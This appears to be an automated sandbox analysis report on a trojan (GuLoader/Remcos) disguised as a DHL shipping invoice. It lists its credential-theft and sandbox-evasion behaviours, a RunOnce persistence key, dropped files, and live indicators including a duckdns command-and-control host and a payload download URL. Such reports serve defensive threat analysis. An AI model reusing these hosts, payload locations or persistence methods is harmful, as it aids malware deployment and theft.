              Non-Standard Port
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              Registry Run Keys / Startup Folder
              1
              DLL Side-Loading
              1
              Credentials In Files
              129
              System Information Discovery
              Distributed Component Object Model11
              Input Capture
              2
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              File Deletion
              LSA Secrets431
              Security Software Discovery
              SSH2
              Clipboard Data
              213
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
              Masquerading
              Cached Domain Credentials1
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Virtualization/Sandbox Evasion
              DCSync4
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem1
              Application Window Discovery
              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586499 Sample: DHL_Awb_Shipping_Invoice_do... Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 34 wealthabundance01.duckdns.org 2->34 36 teldrum.ro 2->36 38 geoplugin.net 2->38 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Multi AV Scanner detection for dropped file 2->58 62 10 other signatures 2->62 8 DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe 29 2->8         started        signatures3 60 Uses dynamic DNS services 34->60 process4 file5 26 C:\Users\user\AppData\Local\...\System.dll, PE32 8->26 dropped 64 Detected unpacking (changes PE section rights) 8->64 66 Tries to steal Mail credentials (via file registry) 8->66 68 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->68 70 2 other signatures 8->70 12 DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe 7 20 8->12         started        signatures6 process7 dnsIp8 40 wealthabundance01.duckdns.org 43.226.229.205, 3981, 49833, 49835 SOFTLAYERUS Hong Kong 12->40 42 teldrum.ro 109.99.162.14, 443, 49832 RTDBucharestRomaniaRO Romania 12->42 44 geoplugin.net 178.237.33.50, 49836, 80 ATOM86-ASATOM86NL Netherlands 12->44 28 C:\Users\user\AppData\Local\...\Surra.bat, PE32 12->28 dropped 30 C:\Users\user\AppData\...\hoaxbtopiw.vbs, data 12->30 dropped 32 C:\ProgramData\remcos\logs.dat, data 12->32 dropped 72 Tries to detect Any.run 12->72 74 Maps a DLL or memory area into another process 12->74 76 Installs a global keyboard hook 12->76 17 DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe 1 12->17         started        20 DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe 1 12->20         started        22 DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe 2 12->22         started        24 wscript.exe 12->24         started        file9 signatures10 process11 signatures12 46 Tries to steal Instant Messenger accounts or passwords 17->46 48 Tries to harvest and steal browser information (history, passwords, etc) 17->48 50 Tries to steal Mail credentials (via file / registry access) 20->50 52 Deletes itself after installation 24->52

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe34%ReversingLabsWin32.Trojan.Guloader
              DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe46%VirustotalBrowse
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\Reprokopists43\Surra.bat34%ReversingLabsWin32.Trojan.Guloader
              C:\Users\user\AppData\Local\Temp\nsn7D60.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://www.imvu.comata0%Avira URL Cloudsafe
              https://teldrum.ro/pefNPfIwXuOzWmfkZMUhyE10.binillssUndcrestereamuschilor.ro/pefNPfIwXuOzWmfkZMUhyE10%Avira URL Cloudsafe
              https://teldrum.ro/pefNPfIwXuOzWmfkZMUhyE10.bin;0%Avira URL Cloudsafe
              https://teldrum.ro/0%Avira URL Cloudsafe
              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
              wealthabundance002..duckdns.org0%Avira URL Cloudsafe
              https://teldrum.ro/90%Avira URL Cloudsafe
              wealthabundance01.duckdns.org0%Avira URL Cloudsafe
              http://www.imvu.comr0%Avira URL Cloudsafe
              https://teldrum.ro/pefNPfIwXuOzWmfkZMUhyE10.bin0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              wealthabundance01.duckdns.org
              43.226.229.205
              truetrue
                unknown
                geoplugin.net
                178.237.33.50
                truefalse
                  high
                  teldrum.ro
                  109.99.162.14
                  truefalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    wealthabundance01.duckdns.orgtrue
                    • Avira URL Cloud: safe
                    unknown
                    https://teldrum.ro/pefNPfIwXuOzWmfkZMUhyE10.binfalse
                    • Avira URL Cloud: safe
                    unknown
                    wealthabundance002..duckdns.orgtrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/AAehyQC.svgbhv3B50.tmp.5.drfalse
                      high
                      http://www.imvu.comrDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423808236953.0000000034620000.00000040.10000000.00040000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svgbhv3B50.tmp.5.drfalse
                        high
                        https://teldrum.ro/pefNPfIwXuOzWmfkZMUhyE10.binillssUndcrestereamuschilor.ro/pefNPfIwXuOzWmfkZMUhyE1DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423806513310.0000000032CF0000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1bhv3B50.tmp.5.drfalse
                          high
                          https://assets.msn.com/weathermapdata/1/static/finance/taskbar/eventbrief.svgbhv3B50.tmp.5.drfalse
                            high
                            https://acctcdn.msftauth.net/datarequestpackage_h-_7C7UzwdefXJT9njDBTQ2.jsbhv3B50.tmp.5.drfalse
                              high
                              https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFpbhv3B50.tmp.5.drfalse
                                high
                                https://acctcdn.msftauth.net/confirmidentity_VMvYfHIi1H4dC5BbwhdrSg2.js?v=1bhv3B50.tmp.5.drfalse
                                  high
                                  http://www.nirsoft.netDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000005.00000002.423701636580.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                    high
                                    https://aefd.nelreports.net/api/report?cat=bingaotakbhv3B50.tmp.5.drfalse
                                      high
                                      https://deff.nelreports.net/api/report?cat=msnbhv3B50.tmp.5.drfalse
                                        high
                                        https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_white_ufRYlllWOw4YyDRibhv3B50.tmp.5.drfalse
                                          high
                                          https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b3bhv3B50.tmp.5.drfalse
                                            high
                                            https://assets.msn.com/weathermapdata/1/static/news/News.svgbhv3B50.tmp.5.drfalse
                                              high
                                              https://www.google.comDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                high
                                                https://logincdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.jsbhv3B50.tmp.5.drfalse
                                                  high
                                                  http://o.pki.goog/wr20%bhv3B50.tmp.5.drfalse
                                                    high
                                                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-CO1r5b&Frbhv3B50.tmp.5.drfalse
                                                      high
                                                      https://logincdn.msftauth.net/shared/1.0/content/js/Win10HostFinish_PCore_rbYp2kZLfQs05CPUNZ-3yA2.jsbhv3B50.tmp.5.drfalse
                                                        high
                                                        https://account.live.com/Resources/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svgbhv3B50.tmp.5.drfalse
                                                          high
                                                          https://maps.windows.com/windows-app-web-linkbhv3B50.tmp.5.drfalse
                                                            high
                                                            https://logincdn.msftauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.cssbhv3B50.tmp.5.drfalse
                                                              high
                                                              https://static-ecst.licdn.com/apc/trans.gif?7c2b66702d00db296676f8f31b5aac19bhv3B50.tmp.5.drfalse
                                                                high
                                                                https://logincdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1bhv3B50.tmp.5.drfalse
                                                                  high
                                                                  http://www.nirsoft.net/DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.imvu.comataDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000003.423682945889.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000003.423683050458.0000000000C3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://aefd.nelreports.net/api/report?cat=wsb&ndcParam=QWthbWFpbhv3B50.tmp.5.drfalse
                                                                      high
                                                                      https://logincdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.jsbhv3B50.tmp.5.drfalse
                                                                        high
                                                                        https://acctcdn.msftauth.net/hostfooterpackage_FOuGbot8yZGKyYkh5yNQBA2.js?v=1bhv3B50.tmp.5.drfalse
                                                                          high
                                                                          https://logincdn.msftauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_w2ql6jjxIAj3_FOY9Wbhv3B50.tmp.5.drfalse
                                                                            high
                                                                            http://www.imvu.com/DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683440754.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsbhv3B50.tmp.5.drfalse
                                                                                high
                                                                                http://i.pki.goog/r1.crt0bhv3B50.tmp.5.drfalse
                                                                                  high
                                                                                  http://www.imvu.comDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000003.423682945889.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000003.423683050458.0000000000C3D000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/cold.svgbhv3B50.tmp.5.drfalse
                                                                                      high
                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/humidity.svgbhv3B50.tmp.5.drfalse
                                                                                        high
                                                                                        https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/stock/svg/light/greenup.svgbhv3B50.tmp.5.drfalse
                                                                                          high
                                                                                          http://nsis.sf.net/NSIS_ErrorErrorDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, Surra.bat.4.drfalse
                                                                                            high
                                                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/MostlyCloudyNight.svbhv3B50.tmp.5.drfalse
                                                                                              high
                                                                                              https://logincdn.msftauth.net/shared/1.0/content/images/arrow_left_43280e0ba671a1d8b5e34f1931c4fe4b.bhv3B50.tmp.5.drfalse
                                                                                                high
                                                                                                https://acctcdn.msftauth.net/corewin10_Lmno_4TyJLm7Xee3gF3aOg2.js?v=1bhv3B50.tmp.5.drfalse
                                                                                                  high
                                                                                                  http://i.pki.goog/wr2.crt0bhv3B50.tmp.5.drfalse
                                                                                                    high
                                                                                                    http://c.pki.goog/wr2/oBFYYahzgVI.crl0bhv3B50.tmp.5.drfalse
                                                                                                      high
                                                                                                      https://fp-afd.azureedge.us/apc/trans.gif?dd18271340d9f89e1196520d4696d927bhv3B50.tmp.5.drfalse
                                                                                                        high
                                                                                                        https://logincdn.msftauth.net/16.000/Converged_v21033_4HqSCTf5FFStBMz0_eIqyA2.cssbhv3B50.tmp.5.drfalse
                                                                                                          high
                                                                                                          https://account.live.com/Resources/images/favicon.icobhv3B50.tmp.5.drfalse
                                                                                                            high
                                                                                                            https://acctcdn.msftauth.net/images/microsoft_logo_7lyNn7YkjJOP0NwZNw6QvQ2.svgbhv3B50.tmp.5.drfalse
                                                                                                              high
                                                                                                              https://logincdn.msftauth.net/shared/1.0/content/js/asyncchunk/win10hostlogin_ppassword_e56656570867bhv3B50.tmp.5.drfalse
                                                                                                                high
                                                                                                                https://teldrum.ro/pefNPfIwXuOzWmfkZMUhyE10.bin;DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                https://aefd.nelreports.net/api/report?cat=bingrmsbhv3B50.tmp.5.drfalse
                                                                                                                  high
                                                                                                                  https://www.google.com/accounts/serviceloginDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exefalse
                                                                                                                    high
                                                                                                                    https://account.live.com/Resources/images/Microsoft_Logotype_Gray_X-qkgtg8KmnQEvm_9mDTcw2.svgbhv3B50.tmp.5.drfalse
                                                                                                                      high
                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/D200PartlySunnyV2.svbhv3B50.tmp.5.drfalse
                                                                                                                        high
                                                                                                                        https://teldrum.ro/DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://acctcdn.msftauth.net/wlivepackagefull_stPwvW3-5mShoxrbkAw2qw2.js?v=1bhv3B50.tmp.5.drfalse
                                                                                                                          high
                                                                                                                          https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/stock/svg/light/reddown.svgbhv3B50.tmp.5.drfalse
                                                                                                                            high
                                                                                                                            https://logincdn.msftauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_kBzKFDC4bzZ-s_mTe2bhv3B50.tmp.5.drfalse
                                                                                                                              high
                                                                                                                              http://crl.pki.goog/gsr1/gsr1.crl0;bhv3B50.tmp.5.drfalse
                                                                                                                                high
                                                                                                                                https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-TEB31r4a&bhv3B50.tmp.5.drfalse
                                                                                                                                  high
                                                                                                                                  https://aefd.nelreports.net/api/report?cat=bingthbhv3B50.tmp.5.drfalse
                                                                                                                                    high
                                                                                                                                    http://geoplugin.net/json.gp-DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://logincdn.msftauth.net/16.000/content/js/WinJS_vcvx4TydCFioSeM4NLxTDw2.jsbhv3B50.tmp.5.drfalse
                                                                                                                                        high
                                                                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition_Badge/AAehwh2.svgbhv3B50.tmp.5.drfalse
                                                                                                                                          high
                                                                                                                                          https://acctcdn.msftauth.net/bootstrapcomponentshim_yGKy8jAx8RL2bLqmBF063w2.js?v=1bhv3B50.tmp.5.drfalse
                                                                                                                                            high
                                                                                                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition_Badge/MostlyClearNigbhv3B50.tmp.5.drfalse
                                                                                                                                              high
                                                                                                                                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423808236953.0000000034620000.00000040.10000000.00040000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000007.00000002.423683491300.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://acctcdn.msftauth.net/accountcorepackage_i2RIx9pJQzxuvCYvcsBhDw2.js?v=1bhv3B50.tmp.5.drfalse
                                                                                                                                                high
                                                                                                                                                https://static-ecst.licdn.com/apc/trans.gif?0e5a548b0a720c79b169af9d741a7fdbbhv3B50.tmp.5.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.xboxab.com/ab?gameid=AC70E74F8D1044C5894D0DC261838A8Dbhv3B50.tmp.5.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://acctcdn.msftauth.net/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/AQI/uspl04.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/recordlow.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://logincdn.msftauth.net/16.000/content/js/ConvergedFinishStrings.en_a-i4DjCYOmIyz-skr6COhA2.jsbhv3B50.tmp.5.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://assets.msn.com/staticsb/statics/latest/icons-wc/icons/entertainment/Watch.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                              high
                                                                                                                                                              http://c.pki.goog/r/r1.crl0bhv3B50.tmp.5.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://login.yahoo.com/config/loginDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exefalse
                                                                                                                                                                  high
                                                                                                                                                                  https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_HFeToeM4u6fzMQF_f_rQ5Qbhv3B50.tmp.5.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://account.live.com/Resources/images/2_vD0yppaJX3jBnfbHF1hqXQ2.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/LFlOFwA=/Condition_Badge/AAehR3S.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://account.live.com/identity/confirm?mkt=EN-US&uiflavor=win10host&client_id=1E0000480728C5&connbhv3B50.tmp.5.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://assets.msn.com/weathermapdata/1/static/news/BreakingNews_72x72.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://account.live.com/Resources/images/Arrows/left_qcwoJO81F7bEFg3Pj_fUEA2.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80bhv3B50.tmp.5.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://assets.msn.com/weathermapdata/1/static/finance/taskbar/icons/earnings/svg/light/blue.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://acctcdn.msftauth.net/jqueryshim_hlu0tTfjWJFWYNt1WZrVqg2.js?v=1bhv3B50.tmp.5.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://fp-afd.azureedge.us/apc/trans.gif?4fea1fdc99823c92451a17d8ca82569ebhv3B50.tmp.5.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://teldrum.ro/9DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002D68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Teaser/snowstart0.svgbhv3B50.tmp.5.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://logincdn.msftauth.net/shared/1.0/content/js/Win10HostLogin_PCore_KgN8HOiYy7zH7lAsyohyug2.jsbhv3B50.tmp.5.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://pki.goog/gsr1/gsr1.crt02bhv3B50.tmp.5.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://static-ecst.licdn.com/apc/trans.gif?a02ba91a859405ae0b0c01140868db41bhv3B50.tmp.5.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://geoplugin.net/json.gpyDHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000002.423794222336.0000000002DD8000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423629557045.0000000002DEC000.00000004.00000020.00020000.00000000.sdmp, DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe, 00000004.00000003.423702210512.0000000002DEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/MSIAWwA=/Condition_Badge/MostlyClearNigbhv3B50.tmp.5.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZEbhv3B50.tmp.5.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://account.live.com/bhv3B50.tmp.5.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        109.99.162.14
                                                                                                                                                                                                        teldrum.roRomania
                                                                                                                                                                                                        9050RTDBucharestRomaniaROfalse
                                                                                                                                                                                                        43.226.229.205
                                                                                                                                                                                                        wealthabundance01.duckdns.orgHong Kong
                                                                                                                                                                                                        36351SOFTLAYERUStrue
                                                                                                                                                                                                        178.237.33.50
                                                                                                                                                                                                        geoplugin.netNetherlands
                                                                                                                                                                                                        8455ATOM86-ASATOM86NLfalse
                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1586499
                                                                                                                                                                                                        Start date and time:2025-01-09 08:35:34 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 15m 3s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                                                                        Run name:Suspected Instruction Hammering
                                                                                                                                                                                                        Number of analysed new started processes analysed:10
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.phis.troj.spyw.evad.winEXE@11/13@3/3
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                                                                        HCA Information:
                                                                                                                                                                                                        • Successful, ratio: 95%
                                                                                                                                                                                                        • Number of executed functions: 161
                                                                                                                                                                                                        • Number of non-executed functions: 331
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                        • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): dllhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 40.126.28.11
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): assets.msn.com, login.live.com, ctldl.windowsupdate.com, api.msn.com
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        08:38:07AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Pocketer C:\Users\user\AppData\Local\Temp\Reprokopists43\Surra.bat
                                                                                                                                                                                                        08:38:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Pocketer C:\Users\user\AppData\Local\Temp\Reprokopists43\Surra.bat
                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        109.99.162.14z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                          DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                            DHL_119040 receipt document,pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              SecuriteInfo.com.W32.MSIL_Kryptik.HRZ.genEldorado.12789.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                  178.237.33.50z58Swiftcopy_MT.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
                                                                                                                                                                                                                  173634822473cd620521fcc8b42a4aac25bbd1c3f6e30c324045b1411f9747e93f432d0281839.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                  • geoplugin.net/json.gp
